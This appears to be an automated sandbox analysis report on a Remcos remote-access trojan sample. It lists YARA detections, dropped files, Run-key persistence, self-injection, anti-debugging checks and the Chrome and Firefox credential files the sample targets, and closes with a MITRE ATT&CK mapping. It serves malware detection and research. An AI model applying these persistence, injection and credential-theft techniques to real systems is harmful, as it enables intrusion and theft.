Source: 00000009.00000003.731106098.0000000002444000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Methodology_Contains_Shortcut_OtherURIhandlers author = @itsreallynick (Nick Carr), description = Detects possible shortcut usage for .URL persistence, reference = https://twitter.com/cglyer/status/1176184798248919044, score = 27.09.2019
Source: 00000009.00000003.731257935.0000000002444000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Methodology_Contains_Shortcut_OtherURIhandlers author = @itsreallynick (Nick Carr), description = Detects possible shortcut usage for .URL persistence, reference = https://twitter.com/cglyer/status/1176184798248919044, score = 27.09.2019
Source: 0000000B.00000003.749327450.000000000284C000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Methodology_Contains_Shortcut_OtherURIhandlers author = @itsreallynick (Nick Carr), description = Detects possible shortcut usage for .URL persistence, reference = https://twitter.com/cglyer/status/1176184798248919044, score = 27.09.2019
Source: 0000000B.00000003.750252073.0000000002854000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Methodology_Contains_Shortcut_OtherURIhandlers author = @itsreallynick (Nick Carr), description = Detects possible shortcut usage for .URL persistence, reference = https://twitter.com/cglyer/status/1176184798248919044, score = 27.09.2019
Source: 00000009.00000003.729493553.0000000002428000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Methodology_Contains_Shortcut_OtherURIhandlers author = @itsreallynick (Nick Carr), description = Detects possible shortcut usage for .URL persistence, reference = https://twitter.com/cglyer/status/1176184798248919044, score = 27.09.2019
Source: 00000009.00000003.728627251.000000000243C000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Methodology_Contains_Shortcut_OtherURIhandlers author = @itsreallynick (Nick Carr), description = Detects possible shortcut usage for .URL persistence, reference = https://twitter.com/cglyer/status/1176184798248919044, score = 27.09.2019
Source: 0000000B.00000003.751417519.0000000002854000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Methodology_Contains_Shortcut_OtherURIhandlers author = @itsreallynick (Nick Carr), description = Detects possible shortcut usage for .URL persistence, reference = https://twitter.com/cglyer/status/1176184798248919044, score = 27.09.2019
Source: 0000000B.00000003.750787460.0000000002854000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Methodology_Contains_Shortcut_OtherURIhandlers author = @itsreallynick (Nick Carr), description = Detects possible shortcut usage for .URL persistence, reference = https://twitter.com/cglyer/status/1176184798248919044, score = 27.09.2019
Source: 0000000B.00000003.749703567.0000000002838000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Methodology_Contains_Shortcut_OtherURIhandlers author = @itsreallynick (Nick Carr), description = Detects possible shortcut usage for .URL persistence, reference = https://twitter.com/cglyer/status/1176184798248919044, score = 27.09.2019
Source: 0000000B.00000003.751016095.0000000002854000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Methodology_Contains_Shortcut_OtherURIhandlers author = @itsreallynick (Nick Carr), description = Detects possible shortcut usage for .URL persistence, reference = https://twitter.com/cglyer/status/1176184798248919044, score = 27.09.2019
Source: 00000009.00000003.731519002.0000000002444000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Methodology_Contains_Shortcut_OtherURIhandlers author = @itsreallynick (Nick Carr), description = Detects possible shortcut usage for .URL persistence, reference = https://twitter.com/cglyer/status/1176184798248919044, score = 27.09.2019
Source: 0000000B.00000003.750523839.0000000002854000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Methodology_Contains_Shortcut_OtherURIhandlers author = @itsreallynick (Nick Carr), description = Detects possible shortcut usage for .URL persistence, reference = https://twitter.com/cglyer/status/1176184798248919044, score = 27.09.2019
Source: C:\Users\Public\vtgpyX.url, type: DROPPED	Matched rule: Methodology_Contains_Shortcut_OtherURIhandlers author = @itsreallynick (Nick Carr), description = Detects possible shortcut usage for .URL persistence, reference = https://twitter.com/cglyer/status/1176184798248919044, score = 27.09.2019
Source: 2.2.V8IB839cvz.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 17.2.Xypgtv.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 15.2.Xypgtv.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda

Source: classification engine

Classification label: mal100.troj.spyw.evad.winEXE@16/9@96/5

Source: C:\Users\user\Desktop\V8IB839cvz.exe

Code function: 2_2_0040E39F GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,GetLastError,

Source: C:\Users\user\Desktop\V8IB839cvz.exe

Code function: 2_2_00409973 CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,CloseHandle,

Source: C:\Users\user\Desktop\V8IB839cvz.exe

Code function: 2_2_004097FD FindResourceA,LoadResource,LockResource,SizeofResource,

Source: C:\Users\user\Desktop\V8IB839cvz.exe

Code function: 2_2_0041031F OpenSCManagerW,OpenServiceW,CloseServiceHandle,StartServiceW,CloseServiceHandle,CloseServiceHandle,CloseServiceHandle,

Source: C:\Users\user\Desktop\V8IB839cvz.exe

File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\2WF3MMUU

Jump to behavior

Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6200:120:WilError_01
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6416:120:WilError_01
Source: C:\Users\user\Desktop\V8IB839cvz.exe	Mutant created: \Sessions\1\BaseNamedObjects\daxvxdsaxzcas-LAPFBZ

Source: C:\Users\user\Desktop\V8IB839cvz.exe

Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ''C:\Users\Public\Trast.bat' '

Source: C:\Users\user\Desktop\V8IB839cvz.exe	Command line argument: Software\
Source: C:\Users\user\Desktop\V8IB839cvz.exe	Command line argument: ProductName
Source: C:\Users\user\Desktop\V8IB839cvz.exe	Command line argument: Remcos
Source: C:\Users\user\Desktop\V8IB839cvz.exe	Command line argument: licence
Source: C:\Users\user\Desktop\V8IB839cvz.exe	Command line argument: Administrator
Source: C:\Users\user\Desktop\V8IB839cvz.exe	Command line argument: User
Source: C:\Users\user\Desktop\V8IB839cvz.exe	Command line argument: [Info]

Source: C:\Users\user\Desktop\V8IB839cvz.exe	Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
Source: C:\Users\user\Desktop\V8IB839cvz.exe	Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
Source: C:\Users\user\Desktop\V8IB839cvz.exe	Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
Source: C:\Users\Public\Xypgtv\Xypgtv.exe	Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
Source: C:\Users\Public\Xypgtv\Xypgtv.exe	Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
Source: C:\Users\Public\Xypgtv\Xypgtv.exe	Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
Source: C:\Users\Public\Xypgtv\Xypgtv.exe	Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
Source: C:\Users\Public\Xypgtv\Xypgtv.exe	Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
Source: C:\Users\Public\Xypgtv\Xypgtv.exe	Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales

Source: C:\Users\user\Desktop\V8IB839cvz.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Source: C:\Users\user\Desktop\V8IB839cvz.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Users\user\Desktop\V8IB839cvz.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Users\user\Desktop\V8IB839cvz.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Users\user\Desktop\V8IB839cvz.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Users\Public\Xypgtv\Xypgtv.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Users\Public\Xypgtv\Xypgtv.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Users\Public\Xypgtv\Xypgtv.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Users\Public\Xypgtv\Xypgtv.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior

Source: V8IB839cvz.exe

ReversingLabs: Detection: 41%

Source: C:\Users\user\Desktop\V8IB839cvz.exe

File read: C:\Users\user\Desktop\V8IB839cvz.exe

Jump to behavior

Source: unknown	Process created: C:\Users\user\Desktop\V8IB839cvz.exe 'C:\Users\user\Desktop\V8IB839cvz.exe'
Source: C:\Users\user\Desktop\V8IB839cvz.exe	Process created: C:\Users\user\Desktop\V8IB839cvz.exe C:\Users\user\Desktop\V8IB839cvz.exe
Source: C:\Users\user\Desktop\V8IB839cvz.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ''C:\Users\Public\Trast.bat' '
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /K C:\Users\Public\UKO.bat
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown	Process created: C:\Users\Public\Xypgtv\Xypgtv.exe 'C:\Users\Public\Xypgtv\Xypgtv.exe'
Source: unknown	Process created: C:\Users\Public\Xypgtv\Xypgtv.exe 'C:\Users\Public\Xypgtv\Xypgtv.exe'
Source: C:\Users\Public\Xypgtv\Xypgtv.exe	Process created: C:\Users\Public\Xypgtv\Xypgtv.exe C:\Users\Public\Xypgtv\Xypgtv.exe
Source: C:\Users\Public\Xypgtv\Xypgtv.exe	Process created: C:\Users\Public\Xypgtv\Xypgtv.exe C:\Users\Public\Xypgtv\Xypgtv.exe
Source: C:\Users\user\Desktop\V8IB839cvz.exe	Process created: C:\Users\user\Desktop\V8IB839cvz.exe C:\Users\user\Desktop\V8IB839cvz.exe
Source: C:\Users\user\Desktop\V8IB839cvz.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ''C:\Users\Public\Trast.bat' '
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /K C:\Users\Public\UKO.bat
Source: C:\Users\Public\Xypgtv\Xypgtv.exe	Process created: C:\Users\Public\Xypgtv\Xypgtv.exe C:\Users\Public\Xypgtv\Xypgtv.exe
Source: C:\Users\Public\Xypgtv\Xypgtv.exe	Process created: C:\Users\Public\Xypgtv\Xypgtv.exe C:\Users\Public\Xypgtv\Xypgtv.exe

Source: Window Recorder

Window detected: More than 3 window changes detected

Data Obfuscation:

Detected unpacking (overwrites its own PE header)

Show sources

Source: C:\Users\user\Desktop\V8IB839cvz.exe	Unpacked PE file: 2.2.V8IB839cvz.exe.400000.0.unpack
Source: C:\Users\Public\Xypgtv\Xypgtv.exe	Unpacked PE file: 15.2.Xypgtv.exe.400000.0.unpack
Source: C:\Users\Public\Xypgtv\Xypgtv.exe	Unpacked PE file: 17.2.Xypgtv.exe.400000.0.unpack

Source: C:\Users\user\Desktop\V8IB839cvz.exe

Code function: 2_2_004096D6 LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetModuleHandleA,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,

Source: C:\Users\user\Desktop\V8IB839cvz.exe	Code function: 0_3_0221825A push 00405E5Ch; ret
Source: C:\Users\user\Desktop\V8IB839cvz.exe	Code function: 0_3_0221825A push 00405E5Ch; ret
Source: C:\Users\user\Desktop\V8IB839cvz.exe	Code function: 0_3_0221825C push 00405E5Ch; ret
Source: C:\Users\user\Desktop\V8IB839cvz.exe	Code function: 0_3_0221825C push 00405E5Ch; ret
Source: C:\Users\user\Desktop\V8IB839cvz.exe	Code function: 0_3_02218294 push 00405E94h; ret
Source: C:\Users\user\Desktop\V8IB839cvz.exe	Code function: 0_3_02218294 push 00405E94h; ret
Source: C:\Users\user\Desktop\V8IB839cvz.exe	Code function: 0_3_02219BAC push ecx; mov dword ptr [esp], eax
Source: C:\Users\user\Desktop\V8IB839cvz.exe	Code function: 0_3_02219BAC push ecx; mov dword ptr [esp], eax
Source: C:\Users\user\Desktop\V8IB839cvz.exe	Code function: 0_3_02217F7C push 00405BA1h; ret
Source: C:\Users\user\Desktop\V8IB839cvz.exe	Code function: 0_3_02217F7C push 00405BA1h; ret
Source: C:\Users\user\Desktop\V8IB839cvz.exe	Code function: 0_3_02218754 push 00406354h; ret
Source: C:\Users\user\Desktop\V8IB839cvz.exe	Code function: 0_3_02218754 push 00406354h; ret
Source: C:\Users\user\Desktop\V8IB839cvz.exe	Code function: 0_3_02215420 push eax; ret
Source: C:\Users\user\Desktop\V8IB839cvz.exe	Code function: 0_3_02215420 push eax; ret
Source: C:\Users\user\Desktop\V8IB839cvz.exe	Code function: 0_3_02218442 push 00406044h; ret
Source: C:\Users\user\Desktop\V8IB839cvz.exe	Code function: 0_3_02218442 push 00406044h; ret
Source: C:\Users\user\Desktop\V8IB839cvz.exe	Code function: 0_3_02218444 push 00406044h; ret
Source: C:\Users\user\Desktop\V8IB839cvz.exe	Code function: 0_3_02218444 push 00406044h; ret
Source: C:\Users\user\Desktop\V8IB839cvz.exe	Code function: 0_3_0221825A push 00405E5Ch; ret
Source: C:\Users\user\Desktop\V8IB839cvz.exe	Code function: 0_3_0221825A push 00405E5Ch; ret
Source: C:\Users\user\Desktop\V8IB839cvz.exe	Code function: 0_3_0221825C push 00405E5Ch; ret
Source: C:\Users\user\Desktop\V8IB839cvz.exe	Code function: 0_3_0221825C push 00405E5Ch; ret
Source: C:\Users\user\Desktop\V8IB839cvz.exe	Code function: 0_3_02218294 push 00405E94h; ret
Source: C:\Users\user\Desktop\V8IB839cvz.exe	Code function: 0_3_02218294 push 00405E94h; ret
Source: C:\Users\user\Desktop\V8IB839cvz.exe	Code function: 0_3_02219BAC push ecx; mov dword ptr [esp], eax
Source: C:\Users\user\Desktop\V8IB839cvz.exe	Code function: 0_3_02219BAC push ecx; mov dword ptr [esp], eax
Source: C:\Users\user\Desktop\V8IB839cvz.exe	Code function: 0_3_02217F7C push 00405BA1h; ret
Source: C:\Users\user\Desktop\V8IB839cvz.exe	Code function: 0_3_02217F7C push 00405BA1h; ret
Source: C:\Users\user\Desktop\V8IB839cvz.exe	Code function: 0_3_02218754 push 00406354h; ret
Source: C:\Users\user\Desktop\V8IB839cvz.exe	Code function: 0_3_02218754 push 00406354h; ret
Source: C:\Users\user\Desktop\V8IB839cvz.exe	Code function: 0_3_02215420 push eax; ret

Source: C:\Users\user\Desktop\V8IB839cvz.exe

Code function: 2_2_00403E7D ShellExecuteW,URLDownloadToFileW,

Source: C:\Users\user\Desktop\V8IB839cvz.exe

File created: C:\Users\Public\Xypgtv\Xypgtv.exe

Jump to dropped file

Source: C:\Users\user\Desktop\V8IB839cvz.exe

Code function: 2_2_0041031F OpenSCManagerW,OpenServiceW,CloseServiceHandle,StartServiceW,CloseServiceHandle,CloseServiceHandle,CloseServiceHandle,

Source: C:\Users\user\Desktop\V8IB839cvz.exe	Registry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run Xypgtv			Jump to behavior
Source: C:\Users\user\Desktop\V8IB839cvz.exe	Registry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run Xypgtv			Jump to behavior

Source: C:\Users\user\Desktop\V8IB839cvz.exe

Source: C:\Users\user\Desktop\V8IB839cvz.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\cmd.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Xypgtv\Xypgtv.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\Public\Xypgtv\Xypgtv.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX

Malware Analysis System Evasion:

Delayed program exit found

Show sources

Source: C:\Users\user\Desktop\V8IB839cvz.exe

Code function: 2_2_00409834 Sleep,ExitProcess,

Source: C:\Users\user\Desktop\V8IB839cvz.exe

Code function: OpenSCManagerA,EnumServicesStatusW,GetLastError,EnumServicesStatusW,OpenServiceW,QueryServiceConfigW,GetLastError,QueryServiceConfigW,CloseServiceHandle,CloseServiceHandle,

Source: C:\Windows\System32\conhost.exe

Last function: Thread delayed

Source: C:\Users\user\Desktop\V8IB839cvz.exe	Code function: 2_2_004041E6 FindFirstFileW,FindNextFileW,
Source: C:\Users\user\Desktop\V8IB839cvz.exe	Code function: 2_2_0043C2E9 FindFirstFileExA,
Source: C:\Users\user\Desktop\V8IB839cvz.exe	Code function: 2_2_00406317 __EH_prolog,__CxxThrowException@8,FindFirstFileW,FindNextFileW,FindClose,FindClose,
Source: C:\Users\user\Desktop\V8IB839cvz.exe	Code function: 2_2_0041146E FindFirstFileW,FindNextFileW,RemoveDirectoryW,FindClose,RemoveDirectoryW,SetFileAttributesW,DeleteFileW,GetLastError,FindClose,
Source: C:\Users\user\Desktop\V8IB839cvz.exe	Code function: 2_2_004074C9 FindFirstFileA,FindClose,DeleteFileA,GetLastError,DeleteFileA,GetLastError,FindNextFileA,FindClose,
Source: C:\Users\user\Desktop\V8IB839cvz.exe	Code function: 2_2_004076E4 FindFirstFileA,FindClose,FindNextFileA,DeleteFileA,GetLastError,FindNextFileA,FindClose,FindClose,
Source: C:\Users\user\Desktop\V8IB839cvz.exe	Code function: 2_2_00406776 __EH_prolog,FindFirstFileW,FindNextFileW,FindClose,FindClose,

Source: C:\Users\user\Desktop\V8IB839cvz.exe

Code function: 2_2_004049A0 SetEvent,ShellExecuteW,GetLogicalDriveStringsA,StrToIntA,CreateDirectoryW,GetFileAttributesW,DeleteFileW,

Source: C:\Users\user\Desktop\V8IB839cvz.exe

Code function: 2_2_0042911F IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,

Source: C:\Users\user\Desktop\V8IB839cvz.exe

Code function: 2_2_00434340 mov eax, dword ptr fs:[00000030h]

Source: C:\Users\user\Desktop\V8IB839cvz.exe

Code function: 2_2_0043D5BD GetProcessHeap,

Source: C:\Users\user\Desktop\V8IB839cvz.exe	Code function: 2_2_0042911F IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,
Source: C:\Users\user\Desktop\V8IB839cvz.exe	Code function: 2_2_004292B1 SetUnhandledExceptionFilter,
Source: C:\Users\user\Desktop\V8IB839cvz.exe	Code function: 2_2_004294DC SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,
Source: C:\Users\user\Desktop\V8IB839cvz.exe	Code function: 2_2_00430AB0 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,

HIPS / PFW / Operating System Protection Evasion:

Injects a PE file into a foreign processes

Show sources

Source: C:\Users\user\Desktop\V8IB839cvz.exe	Memory written: C:\Users\user\Desktop\V8IB839cvz.exe base: 400000 value starts with: 4D5A
Source: C:\Users\Public\Xypgtv\Xypgtv.exe	Memory written: C:\Users\Public\Xypgtv\Xypgtv.exe base: 400000 value starts with: 4D5A
Source: C:\Users\Public\Xypgtv\Xypgtv.exe	Memory written: C:\Users\Public\Xypgtv\Xypgtv.exe base: 400000 value starts with: 4D5A

Source: C:\Users\user\Desktop\V8IB839cvz.exe

Code function: 2_2_0040F733 StrToIntA,mouse_event,

Source: C:\Users\user\Desktop\V8IB839cvz.exe	Process created: C:\Users\user\Desktop\V8IB839cvz.exe C:\Users\user\Desktop\V8IB839cvz.exe
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /K C:\Users\Public\UKO.bat
Source: C:\Users\Public\Xypgtv\Xypgtv.exe	Process created: C:\Users\Public\Xypgtv\Xypgtv.exe C:\Users\Public\Xypgtv\Xypgtv.exe
Source: C:\Users\Public\Xypgtv\Xypgtv.exe	Process created: C:\Users\Public\Xypgtv\Xypgtv.exe C:\Users\Public\Xypgtv\Xypgtv.exe

Source: V8IB839cvz.exe, 00000002.00000002.912525207.0000000000DB0000.00000002.00000001.sdmp	Binary or memory string: Program Manager
Source: V8IB839cvz.exe, 00000002.00000002.912525207.0000000000DB0000.00000002.00000001.sdmp	Binary or memory string: Shell_TrayWnd
Source: V8IB839cvz.exe, 00000002.00000002.912525207.0000000000DB0000.00000002.00000001.sdmp	Binary or memory string: Progman
Source: V8IB839cvz.exe, 00000002.00000002.912525207.0000000000DB0000.00000002.00000001.sdmp	Binary or memory string: Progmanlock

Source: C:\Users\user\Desktop\V8IB839cvz.exe

Code function: 2_2_00410E32 cpuid

Source: C:\Users\user\Desktop\V8IB839cvz.exe	Code function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,
Source: C:\Users\user\Desktop\V8IB839cvz.exe	Code function: GetLocaleInfoW,
Source: C:\Users\user\Desktop\V8IB839cvz.exe	Code function: IsValidCodePage,_wcschr,_wcschr,GetLocaleInfoW,
Source: C:\Users\user\Desktop\V8IB839cvz.exe	Code function: GetLocaleInfoA,
Source: C:\Users\user\Desktop\V8IB839cvz.exe	Code function: EnumSystemLocalesW,
Source: C:\Users\user\Desktop\V8IB839cvz.exe	Code function: EnumSystemLocalesW,
Source: C:\Users\user\Desktop\V8IB839cvz.exe	Code function: EnumSystemLocalesW,
Source: C:\Users\user\Desktop\V8IB839cvz.exe	Code function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,
Source: C:\Users\user\Desktop\V8IB839cvz.exe	Code function: EnumSystemLocalesW,
Source: C:\Users\user\Desktop\V8IB839cvz.exe	Code function: GetLocaleInfoW,
Source: C:\Users\user\Desktop\V8IB839cvz.exe	Code function: GetLocaleInfoW,GetLocaleInfoW,GetACP,
Source: C:\Users\user\Desktop\V8IB839cvz.exe	Code function: GetLocaleInfoW,

Source: C:\Windows\SysWOW64\cmd.exe

Queries volume information: C:\ VolumeInformation

Source: C:\Users\user\Desktop\V8IB839cvz.exe

Code function: 2_2_00438112 GetSystemTimeAsFileTime,

Source: C:\Users\user\Desktop\V8IB839cvz.exe

Code function: 2_2_00410C6E CreateThread,GetComputerNameExW,GetUserNameW,

Source: C:\Users\Public\Xypgtv\Xypgtv.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Stealing of Sensitive Information:

Yara detected Remcos RAT

Show sources

Source: Yara match	File source: 0000000F.00000002.778791601.0000000000449000.00000002.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000000.688515879.0000000000449000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000000.688799265.0000000000449000.00000002.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000011.00000000.795919569.0000000000449000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000F.00000000.777883581.0000000000449000.00000002.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000F.00000000.777134487.0000000000449000.00000002.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000011.00000000.797923003.0000000000449000.00000002.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000F.00000000.776696975.0000000000449000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000000.689160997.0000000000449000.00000002.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.912239074.0000000000449000.00000002.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000011.00000000.796293762.0000000000449000.00000002.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000011.00000002.798843830.0000000000449000.00000002.00000001.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: Xypgtv.exe PID: 6324, type: MEMORY
Source: Yara match	File source: Process Memory Space: Xypgtv.exe PID: 6480, type: MEMORY
Source: Yara match	File source: Process Memory Space: V8IB839cvz.exe PID: 6584, type: MEMORY
Source: Yara match	File source: 2.2.V8IB839cvz.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 17.2.Xypgtv.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 15.2.Xypgtv.exe.400000.0.unpack, type: UNPACKEDPE

Contains functionality to steal Chrome passwords or cookies

Show sources

Source: C:\Users\user\Desktop\V8IB839cvz.exe

Code function: \AppData\Local\Google\Chrome\User Data\Default\Login Data

Contains functionality to steal Firefox passwords or cookies

Show sources

Source: C:\Users\user\Desktop\V8IB839cvz.exe	Code function: \AppData\Roaming\Mozilla\Firefox\Profiles\
Source: C:\Users\user\Desktop\V8IB839cvz.exe	Code function: \key3.db

Remote Access Functionality:

Yara detected Remcos RAT

Show sources

Source: Yara match	File source: 0000000F.00000002.778791601.0000000000449000.00000002.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000000.688515879.0000000000449000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000000.688799265.0000000000449000.00000002.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000011.00000000.795919569.0000000000449000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000F.00000000.777883581.0000000000449000.00000002.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000F.00000000.777134487.0000000000449000.00000002.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000011.00000000.797923003.0000000000449000.00000002.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000F.00000000.776696975.0000000000449000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000000.689160997.0000000000449000.00000002.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.912239074.0000000000449000.00000002.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000011.00000000.796293762.0000000000449000.00000002.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000011.00000002.798843830.0000000000449000.00000002.00000001.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: Xypgtv.exe PID: 6324, type: MEMORY
Source: Yara match	File source: Process Memory Space: Xypgtv.exe PID: 6480, type: MEMORY
Source: Yara match	File source: Process Memory Space: V8IB839cvz.exe PID: 6584, type: MEMORY
Source: Yara match	File source: 2.2.V8IB839cvz.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 17.2.Xypgtv.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 15.2.Xypgtv.exe.400000.0.unpack, type: UNPACKEDPE

Source: C:\Users\user\Desktop\V8IB839cvz.exe

Code function: cmd.exe

Mitre Att&ck Matrix

Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Exfiltration	Command and Control	Network Effects	Remote Service Effects	Impact
Valid Accounts	Scripting1	Application Shimming1	Application Shimming1	Deobfuscate/Decode Files or Information1	OS Credential Dumping1	System Time Discovery1	Remote Services	Archive Collected Data11	Exfiltration Over Other Network Medium	Ingress Tool Transfer11	Eavesdrop on Insecure Network Communication	Remotely Track Device Without Authorization	System Shutdown/Reboot1
Default Accounts	Native API1	Windows Service1	Access Token Manipulation1	Scripting1	Credentials In Files2	Account Discovery1	Remote Desktop Protocol	Clipboard Data2	Exfiltration Over Bluetooth	Encrypted Channel22	Exploit SS7 to Redirect Phone Calls/SMS	Remotely Wipe Data Without Authorization	Device Lockout
Domain Accounts	Command and Scripting Interpreter12	Registry Run Keys / Startup Folder1	Windows Service1	Obfuscated Files or Information2	Security Account Manager	System Service Discovery1	SMB/Windows Admin Shares	Data from Network Shared Drive	Automated Exfiltration	Non-Standard Port1	Exploit SS7 to Track Device Location	Obtain Device Cloud Backups	Delete Device Data
